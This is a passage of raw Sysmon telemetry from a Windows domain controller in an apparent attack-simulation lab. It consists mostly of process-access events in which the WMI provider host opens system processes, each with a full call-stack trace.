dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AAA2DE423C059A6674683F59CC04F23,SHA256=7B07B82F0866F9EE4D5D9CD7C666CCF7798E263E45A8A96DAC5220D9B722AB58,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D3AA-00000000AD01}15816C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D3AA-00000000AD01}15816C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6DD2-603E-D3AA-00000000AD01}1581611488C:\Windows\system32\conhost.exe{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.811{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 